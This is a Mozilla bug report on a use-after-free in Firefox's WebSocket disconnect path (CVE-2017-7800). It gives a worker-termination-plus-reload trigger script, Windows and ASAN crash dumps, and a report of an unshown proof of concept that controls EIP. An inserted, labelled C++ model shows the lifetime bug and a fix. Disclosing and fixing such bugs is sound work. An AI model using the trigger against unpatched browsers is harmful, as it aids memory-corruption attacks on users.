Bug 1374047 (CVE-2017-7800) - WebSocket - Use After Free in WebSocketImpl::DisconnectInternal()
Status: Closed (RESOLVED FIXED); opened 7 years ago, closed 7 years ago
Categories: Core :: DOM: Core & HTML, defect
Target milestone: mozilla56
People: Reporter: loobenyang, Assigned: baku
Details: 5 keywords, Whiteboard: [adv-main55+][adv-esr52.3+]
Attachments (4 files, 1 obsolete file):
- 1.09 KB, application/javascript
- 1.89 KB, text/plain
- 1.69 KB, patch (jcristau: approval-mozilla-beta+, approval-mozilla-esr52+)
- 1.68 KB, text/plain
Reproduction test case (whole server code in attached file UAF_DisconnectInternal_Repro.js):
Main page code:
<script>
var worker0 = new Worker("worker0.js");
// Terminate the worker and reload the page at the same moment, so the
// worker's WebSocket is torn down while its disconnect is still in flight.
setTimeout(function(){ worker0.terminate(); }, 200);
setTimeout(function(){ location.reload(); }, 200);
</script>
Worker code:
new WebSocket("ws://localhost:12345/", "wsm1-protocol");
Steps to reproduce:
1. Run server side script UAF_DisconnectInternal_Repro.js with Node.js (node UAF_DisconnectInternal_Repro.js).
2. Enter http://localhost:12345 in Firefox browser.
Firefox version: 54.0 (32-bit)
OS: Windows 10
Stack trace:
(16a8.30b4): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=18d77028 ecx=18d77028 edx=e5e5e5e5 esi=67d4b030 edi=18d76f80
eip=65f98e0c esp=0117f1cc ebp=0117f1cc iopl=0 nv up ei ng nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010282
xul!mozilla::RefPtrTraits<mozilla::EditTransactionBase>::Release [inlined in xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+0x12]:
65f98e0c 8b02 mov eax,dword ptr [edx] ds:002b:e5e5e5e5=????????
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
FAULTING_IP:
xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+12 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\mozilla\refptr.h @ 65]
65f98e0c 8b02 mov eax,dword ptr [edx]
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 65f98e0c (xul!mozilla::RefPtrTraits<mozilla::EditTransactionBase>::Release)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000000
Parameter[1]: e5e5e5e5
Attempt to read from address e5e5e5e5
FAULTING_THREAD: 000030b4
PROCESS_NAME: firefox.exe
ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 00000000
EXCEPTION_PARAMETER2: e5e5e5e5
FOLLOWUP_IP:
xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+12 [c:\builds\moz2_slave\m-rel-w32-00000000000000000000\build\src\obj-firefox\dist\include\mozilla\refptr.h @ 65]
65f98e0c 8b02 mov eax,dword ptr [edx]
READ_ADDRESS: e5e5e5e5
LAST_CONTROL_TRANSFER: from 66cb658b to 65f98e0c
STACK_TEXT:
0117f1cc 66cb658b 00000000 00000000 16daeee0 xul!RefPtr<mozilla::EditTransactionBase>::assign_assuming_AddRef+0x12
0117f1fc 66cba1d4 6620c149 15ac8ec0 15ac8ef4 xul!mozilla::dom::WebSocketImpl::DisconnectInternal+0x4b
0117f200 6620c149 15ac8ec0 15ac8ef4 00000000 xul!mozilla::dom::`anonymous namespace'::DisconnectInternalRunnable::MainThreadRun+0x8
0117f214 6620c109 16daeee0 13981380 139813b4 xul!mozilla::dom::workers::WorkerMainThreadRunnable::Run+0x15
0117f23c 6620c08d 0117f26c 6620c109 180ec050 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
0117f244 6620c109 180ec050 0b1f5864 180ec060 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xe
0117f26c 6620c08d 0117f2e4 6601f80e 180ec060 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
0117f274 6601f80e 180ec060 03127170 03127160 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xe
0117f2e4 66020701 03104200 00000000 0117f317 xul!nsThread::ProcessNextEvent+0x213
0117f318 66068ea0 03125060 60944f31 0b1f5860 xul!mozilla::ipc::MessagePump::Run+0x72
0117f350 66068e6f 03104200 00000001 0b1f5800 xul!MessageLoop::RunHandler+0x20
0117f370 662d19d8 0b1f7640 00000000 0117f390 xul!MessageLoop::Run+0x19
0117f380 662d1767 0b1f5860 0b1f7640 0117f3a4 xul!nsBaseAppShell::Run+0x34
0117f390 662d171c 0b1f5860 0117f6f5 0c30a440 xul!nsAppShell::Run+0x26
0117f3a4 66505f9e 0b1f7640 0117f5f8 0117f610 xul!nsAppStartup::Run+0x22
0117f598 665069d0 03103050 0117f740 00000001 xul!XREMain::XRE_mainRun+0xa92
0117f5d4 6658b805 00000000 0117f610 0017f740 xul!XREMain::XRE_main+0x37b
0117f700 6658b7c7 0117f740 0117fa84 01321bdd xul!XRE_main+0x39
0117f70c 01321bdd 00000001 03103050 0117f740 xul!mozilla::BootstrapImpl::XRE_main+0x11
0117fa84 01325b7f 00000001 fe615d08 01718b50 firefox!wmain+0x65d
0117facc 73b48744 00ee0000 73b48720 7b9e292a firefox!__scrt_common_main_seh+0xf9
0117fae0 770a587d 00ee0000 7f378ec4 00000000 KERNEL32!BaseThreadInitThunk+0x24
0117fb28 770a584d ffffffff 770c6344 00000000 ntdll!__RtlUserThreadStart+0x2f
0117fb38 00000000 01325bf5 00ee0000 00000000 ntdll!_RtlUserThreadStart+0x1b
---------
The local variable shows that the WebSocketImpl object had been freed:
0:000> dt this
Local var @ edi Type mozilla::dom::WebSocketImpl*
+0x000 __VFN_table : 0xe5e5e5e5
+0x004 __VFN_table : 0xe5e5e5e5
+0x008 __VFN_table : 0xe5e5e5e5
+0x00c __VFN_table : 0xe5e5e5e5
+0x010 mProxy : 0xe5e5e5e5 nsWeakReference
+0x014 __VFN_table : 0xe5e5e5e5
+0x018 __VFN_table : 0xe5e5e5e5
+0x01c mRefCnt : mozilla::ThreadSafeAutoRefCnt
+0x020 mWebSocket : RefPtr<mozilla::dom::WebSocket>
+0x024 mChannel : nsCOMPtr<nsIWebSocketChannel>
+0x028 mIsServerSide : ffffffffffffffe5
+0x029 mSecure : ffffffffffffffe5
+0x02a mOnCloseScheduled : ffffffffffffffe5
+0x02b mFailed : ffffffffffffffe5
+0x02c mDisconnectingOrDisconnected : ffffffffffffffe5
+0x02d mCloseEventWasClean : ffffffffffffffe5
+0x030 mCloseEventReason : nsString
+0x03c mCloseEventCode : 0xe5e5
+0x040 mAsciiHost : nsCString
+0x04c mPort : 0xe5e5e5e5
+0x050 mResource : nsCString
+0x05c mUTF16Origin : nsString
+0x068 mURI : nsCString
+0x074 mRequestedProtocolList : nsCString
+0x080 mOriginDocument : nsCOMPtr<nsIWeakReference>
+0x084 mScriptFile : nsCString
+0x090 mScriptLine : 0xe5e5e5e5
+0x094 mScriptColumn : 0xe5e5e5e5
+0x098 mInnerWindowID : 0xe5e5e5e5`e5e5e5e5
+0x0a0 mWorkerPrivate : 0xe5e5e5e5 mozilla::dom::workers::WorkerPrivate
+0x0a4 mWorkerHolder : nsAutoPtr<mozilla::dom::workers::WorkerHolder>
+0x0a8 mWeakLoadGroup : nsCOMPtr<nsIWeakReference>
+0x0ac mIsMainThread : ffffffffffffffe5
+0x0b0 mMutex : mozilla::Mutex
+0x0b4 mWorkerShuttingDown : ffffffffffffffe5
+0x0b8 mService : RefPtr<mozilla::net::WebSocketEventService>
Comment 1 (Reporter, 7 years ago):
Ran the same test case in a locally built Linux ASAN build; it did report a Use After Free:
Firefox version: 56.0a1 (2017-06-17) (64-bit)
=================================================================
==2917==ERROR: AddressSanitizer: heap-use-after-free on address 0x6130000d0388 at pc 0x7f8911403be3 bp 0x7fffcedacf50 sp 0x7fffcedacf48
READ of size 8 at 0x6130000d0388 thread T0 (Web Content)
#0 0x7f8911403be2 in assign_assuming_AddRef /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsCOMPtr.h:329:27
#1 0x7f8911403be2 in operator= /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsCOMPtr.h:600
#2 0x7f8911403be2 in mozilla::dom::WebSocketImpl::DisconnectInternal() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:666
#3 0x7f891147b96f in mozilla::dom::(anonymous namespace)::DisconnectInternalRunnable::MainThreadRun() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:597:5
#4 0x7f8914b01c04 in mozilla::dom::workers::WorkerMainThreadRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerRunnable.cpp:608:20
#5 0x7f890e173712 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:190:15
#6 0x7f890e17324f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:74:7
#7 0x7f890e173712 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:190:15
#8 0x7f890e17324f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:74:7
#9 0x7f890e157a9f in mozilla::SchedulerGroup::Runnable::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/SchedulerGroup.cpp:368:14
#10 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
#11 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
#12 0x7f890f22bc91 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/thecoder/OpenSrc/firefox/ipc/glue/MessagePump.cpp:96:21
#13 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
#14 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
#15 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
#16 0x7f89151319ff in nsBaseAppShell::Run() /home/thecoder/OpenSrc/firefox/widget/nsBaseAppShell.cpp:156:3
#17 0x7f8919da4eb7 in XRE_RunAppShell() /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:896:12
#18 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
#19 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
#20 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
#21 0x7f8919da4404 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:712:7
#22 0x4f6255 in content_process_main /home/thecoder/OpenSrc/firefox/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
#23 0x4f6255 in main /home/thecoder/OpenSrc/firefox/browser/app/nsBrowserApp.cpp:286
#24 0x7f892b1ba82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#25 0x41da58 in _start (/home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/bin/firefox+0x41da58)
0x6130000d0388 is located 264 bytes inside of 336-byte region [0x6130000d0280,0x6130000d03d0)
freed by thread T0 (Web Content) here:
#0 0x4bef80 in __interceptor_cfree.localalias.0 /home/thecoder/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:45
#1 0x7f8911400172 in operator delete /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/mozilla/mozalloc.h:218:12
#2 0x7f8911400172 in Release /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:259
#3 0x7f8911400172 in non-virtual thunk to mozilla::dom::WebSocketImpl::Release() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:259
#4 0x7f890e33b4dc in ~nsCOMPtr_base /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsCOMPtr.h:294:7
#5 0x7f890e33b4dc in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /home/thecoder/OpenSrc/firefox/netwerk/base/nsLoadGroup.cpp:644
#6 0x7f8911403952 in mozilla::dom::WebSocketImpl::DisconnectInternal() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:663:5
#7 0x7f891147b96f in mozilla::dom::(anonymous namespace)::DisconnectInternalRunnable::MainThreadRun() /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:597:5
#8 0x7f8914b01c04 in mozilla::dom::workers::WorkerMainThreadRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerRunnable.cpp:608:20
#9 0x7f890e173712 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:190:15
#10 0x7f890e17324f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:74:7
#11 0x7f890e173712 in mozilla::ThrottledEventQueue::Inner::ExecuteRunnable() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:190:15
#12 0x7f890e17324f in mozilla::ThrottledEventQueue::Inner::Executor::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/ThrottledEventQueue.cpp:74:7
#13 0x7f890e157a9f in mozilla::SchedulerGroup::Runnable::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/SchedulerGroup.cpp:368:14
#14 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
#15 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
#16 0x7f890f22bc91 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/thecoder/OpenSrc/firefox/ipc/glue/MessagePump.cpp:96:21
#17 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
#18 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
#19 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
#20 0x7f89151319ff in nsBaseAppShell::Run() /home/thecoder/OpenSrc/firefox/widget/nsBaseAppShell.cpp:156:3
#21 0x7f8919da4eb7 in XRE_RunAppShell() /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:896:12
#22 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
#23 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
#24 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
#25 0x7f8919da4404 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:712:7
#26 0x4f6255 in content_process_main /home/thecoder/OpenSrc/firefox/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
#27 0x4f6255 in main /home/thecoder/OpenSrc/firefox/browser/app/nsBrowserApp.cpp:286
#28 0x7f892b1ba82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
previously allocated by thread T29 (DOM Worker) here:
#0 0x4bf108 in __interceptor_malloc /home/thecoder/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52
#1 0x4f72dd in moz_xmalloc /home/thecoder/OpenSrc/firefox/memory/mozalloc/mozalloc.cpp:83:17
#2 0x7f8911409473 in operator new /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/mozilla/mozalloc.h:194:12
#3 0x7f8911409473 in WebSocket /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:945
#4 0x7f8911409473 in mozilla::dom::WebSocket::ConstructorCommon(mozilla::dom::GlobalObject const&, nsAString const&, mozilla::dom::Sequence<nsString> const&, nsITransportProvider*, nsACString const&, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:1287
#5 0x7f891140b3fe in mozilla::dom::WebSocket::Constructor(mozilla::dom::GlobalObject const&, nsAString const&, nsAString const&, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/base/WebSocket.cpp:986:10
#6 0x7f89128b2000 in mozilla::dom::WebSocketBinding::_constructor(JSContext*, unsigned int, JS::Value*) /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dom/bindings/WebSocketBinding.cpp:1073:59
#7 0x7f891a34790b in CallJSNative /home/thecoder/OpenSrc/firefox/js/src/jscntxtinlines.h:293:15
#8 0x7f891a34790b in CallJSNativeConstructor /home/thecoder/OpenSrc/firefox/js/src/jscntxtinlines.h:326
#9 0x7f891a34790b in InternalConstruct(JSContext*, js::AnyConstructArgs const&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:573
#10 0x7f891a32e4c8 in ConstructFromStack /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:599:12
#11 0x7f891a32e4c8 in Interpret(JSContext*, js::RunState&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:3059
#12 0x7f891a315250 in js::RunScript(JSContext*, js::RunState&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:410:12
#13 0x7f891a3491cb in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:699:15
#14 0x7f891a349a49 in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:731:12
#15 0x7f891acf3543 in Evaluate(JSContext*, js::ScopeKind, JS::Handle<JSObject*>, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /home/thecoder/OpenSrc/firefox/js/src/jsapi.cpp:4719:19
#16 0x7f891acf3d2f in JS::Evaluate(JSContext*, JS::ReadOnlyCompileOptions const&, JS::SourceBufferHolder&, JS::MutableHandle<JS::Value>) /home/thecoder/OpenSrc/firefox/js/src/jsapi.cpp:4784:12
#17 0x7f8914a44959 in (anonymous namespace)::ScriptExecutorRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) /home/thecoder/OpenSrc/firefox/dom/workers/ScriptLoader.cpp:1969:10
#18 0x7f8914b00077 in mozilla::dom::workers::WorkerRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerRunnable.cpp:374:12
#19 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
#20 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
#21 0x7f8914af0d17 in mozilla::dom::workers::WorkerPrivate::RunCurrentSyncLoop() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:5874:7
#22 0x7f89149f2bb2 in Run /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.h:1644:12
#23 0x7f89149f2bb2 in (anonymous namespace)::LoadAllScripts(mozilla::dom::workers::WorkerPrivate*, nsTArray<(anonymous namespace)::ScriptLoadInfo>&, bool, mozilla::dom::workers::WorkerScriptType, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/workers/ScriptLoader.cpp:2127
#24 0x7f89149f24b5 in mozilla::dom::workers::scriptloader::LoadMainScript(mozilla::dom::workers::WorkerPrivate*, nsAString const&, mozilla::dom::workers::WorkerScriptType, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/workers/ScriptLoader.cpp:2245:3
#25 0x7f8914b10d0d in (anonymous namespace)::CompileScriptRunnable::WorkerRun(JSContext*, mozilla::dom::workers::WorkerPrivate*) /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:586:5
#26 0x7f8914b00077 in mozilla::dom::workers::WorkerRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/WorkerRunnable.cpp:374:12
#27 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
#28 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
#29 0x7f8914aea4f3 in mozilla::dom::workers::WorkerPrivate::DoRunLoop(JSContext*) /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:5118:7
#30 0x7f8914a36f75 in (anonymous namespace)::WorkerThreadPrimaryRunnable::Run() /home/thecoder/OpenSrc/firefox/dom/workers/RuntimeService.cpp:2916:9
#31 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
#32 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
#33 0x7f890f22d296 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /home/thecoder/OpenSrc/firefox/ipc/glue/MessagePump.cpp:368:5
#34 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
#35 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
#36 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
#37 0x7f890e17e7df in nsThread::ThreadFunc(void*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:503:5
SUMMARY: AddressSanitizer: heap-use-after-free /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsCOMPtr.h:329:27 in assign_assuming_AddRef
==2917==ABORTING
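A minimal C++ model of the lifetime bug the ASAN report above pins down, added here as an example and not Firefox code: nsLoadGroup::RemoveRequest (WebSocket.cpp:663) drops the last strong reference to the WebSocketImpl, and the assignment to mWeakLoadGroup (WebSocket.cpp:666) then touches freed memory. LoadGroup, SocketImpl, StrongRef and the poison-quarantine Release are assumptions of the model; the hardened variant holds a strong reference to `this` across the call, the usual Gecko remedy for this pattern, but the page does not state which fix shipped.

```cpp
// Added example, not Firefox code: a minimal model of the lifetime bug the ASAN
// report pins down. LoadGroup stands in for nsLoadGroup, SocketImpl for
// WebSocketImpl; StrongRef models holding a reference to |this| across the call.
#include <algorithm>
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <new>
#include <vector>

// jemalloc fills freed memory with 0xe5; the register dump in the report shows
// exactly that pattern (edx=e5e5e5e5) when the stale member is read.
static constexpr unsigned char kFreePoison = 0xe5;
static uintptr_t PoisonWord() { uintptr_t w; std::memset(&w, kFreePoison, sizeof w); return w; }

class LoadGroup;

class SocketImpl {
 public:
  explicit SocketImpl(LoadGroup* aGroup) : mWeakLoadGroup(aGroup) {}
  void AddRef() { ++mRefCnt; }
  // Models nsISupports::Release. At zero the object is "freed": its storage is
  // poisoned but kept mapped (a quarantine), so the stale access is observable
  // here instead of crashing as it does on a real free.
  void Release() {
    if (--mRefCnt == 0) std::memset(static_cast<void*>(this), kFreePoison, sizeof(SocketImpl));
  }
  bool DisconnectInternalBuggy();
  bool DisconnectInternalFixed();
 private:
  bool DisconnectBody();
  // Reads the member as raw bits so a poisoned value can be compared safely.
  uintptr_t WeakLoadGroupBits() const { uintptr_t v; std::memcpy(&v, &mWeakLoadGroup, sizeof v); return v; }
  int mRefCnt = 0;
  LoadGroup* mWeakLoadGroup;  // stands in for nsCOMPtr<nsIWeakReference> mWeakLoadGroup
};

// RAII strong reference: the RefPtr<T> "kungFuDeathGrip" idiom.
struct StrongRef {
  explicit StrongRef(SocketImpl* aPtr) : mPtr(aPtr) { mPtr->AddRef(); }
  ~StrongRef() { mPtr->Release(); }
  SocketImpl* mPtr;
};

class LoadGroup {
 public:
  void AddRequest(SocketImpl* aReq) { aReq->AddRef(); mRequests.push_back(aReq); }
  // Like nsLoadGroup::RemoveRequest: drops the group's strong reference. When the
  // group is the last owner (the WebSocket wrapper already let go when the worker
  // was terminated), the request dies while its own method is still on the stack.
  void RemoveRequest(SocketImpl* aReq) {
    auto it = std::find(mRequests.begin(), mRequests.end(), aReq);
    if (it == mRequests.end()) return;
    mRequests.erase(it);
    aReq->Release();
  }
 private:
  std::vector<SocketImpl*> mRequests;
};

// Same order as the report: RemoveRequest (WebSocket.cpp:663), then an assignment
// to mWeakLoadGroup (WebSocket.cpp:666). Returns true if that assignment hit
// freed (poisoned) memory.
bool SocketImpl::DisconnectBody() {
  if (LoadGroup* group = mWeakLoadGroup) group->RemoveRequest(this);  // may drop the last ref to |this|
  bool stale = WeakLoadGroupBits() == PoisonWord();
  mWeakLoadGroup = nullptr;  // the write ASAN flagged
  return stale;
}

bool SocketImpl::DisconnectInternalBuggy() { return DisconnectBody(); }

bool SocketImpl::DisconnectInternalFixed() {
  StrongRef grip(this);  // keeps |this| alive until the method returns
  return DisconnectBody();
}

// One scenario: a SocketImpl whose only remaining strong owner is the load group.
// Returns true when DisconnectInternal touched freed storage.
bool DisconnectTouchesFreedMemory(bool aHardened) {
  LoadGroup group;
  void* storage = ::operator new(sizeof(SocketImpl));
  SocketImpl* impl = new (storage) SocketImpl(&group);
  group.AddRequest(impl);  // refcount 1: the group is the sole owner
  bool stale = aHardened ? impl->DisconnectInternalFixed() : impl->DisconnectInternalBuggy();
  ::operator delete(storage);  // release the quarantined storage
  return stale;
}

int main() {
  std::printf("buggy touched freed memory: %d\nhardened touched freed memory: %d\n",
              DisconnectTouchesFreedMemory(false), DisconnectTouchesFreedMemory(true));
  return 0;
}
```

With a real allocator the buggy path is the heap-use-after-free ASAN reports in comment 1; the quarantine only makes it observable here without a crash.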
Comment 2 (Reporter, 7 years ago):
A POC UAF_DisconnectInternal_POC_EIP_41414141.js is attached to demonstrate the clear exploitability by controlling the EIP register.
Firefox Version: 56.0a1 (2017-06-17) (32-bit)
OS: Windows 10 Home 64-bit
(740.23a8): Access violation - code c0000005 (!!! second chance !!!)
eax=a1a1a1a1 ebx=1863b750 ecx=1863b750 edx=e5e5e5e5 esi=64136424 edi=1863b6a0
eip=41414141 esp=010fecdc ebp=010fece4 iopl=0 nv up ei ng nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210282
41414141 ?? ???
FAULTING_IP:
unknown!noop+0
41414141 ?? ???
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 41414141
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000008
Parameter[1]: 41414141
Attempt to execute non-executable address 41414141
0x41414141
xul!mozilla::RefPtrTraits<mozilla::layers::LayersIPCChannel>::Release+0x6
xul!RefPtr<mozilla::layers::LayersIPCChannel>::ConstRemovingRefPtrTraits<mozilla::layers::LayersIPCChannel>::Release+0x6
xul!RefPtr<mozilla::layers::LayersIPCChannel>::assign_assuming_AddRef+0x18
xul!nsCOMPtr<nsIWeakReference>::operator=+0x9
xul!mozilla::dom::WebSocketImpl::DisconnectInternal+0x4b
xul!mozilla::dom::`anonymous namespace'::DisconnectInternalRunnable::MainThreadRun+0x8
xul!mozilla::dom::workers::WorkerMainThreadRunnable::Run+0x15
xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x6c
xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xf
xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x6c
xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xf
xul!nsThread::ProcessNextEvent+0x23a
xul!NS_ProcessNextEvent+0x14
xul!mozilla::ipc::MessagePump::Run+0x7a
xul!MessageLoop::RunInternal+0x8
xul!MessageLoop::RunHandler+0x20
xul!MessageLoop::Run+0x19
xul!nsBaseAppShell::Run+0x34
xul!nsAppShell::Run+0x26
Updated•7 years ago
Group: core-security → dom-core-security
Flags: sec-bounty?
Comment 3•7 years ago
baku: you were recently in this code in bug 1369913 so this is probably freshest on your mind. This doesn't look like the same issue (Disconnect vs Send).
Flags: needinfo?(amarchesini)
Keywords: sec-high → sec-critical
Assignee
Updated•7 years ago
Assignee: nobody → amarchesini
Flags: needinfo?(amarchesini)
Assignee
Comment 4•7 years ago
Attachment #8879832 -
Flags: review?(bugs)
Comment 5•7 years ago
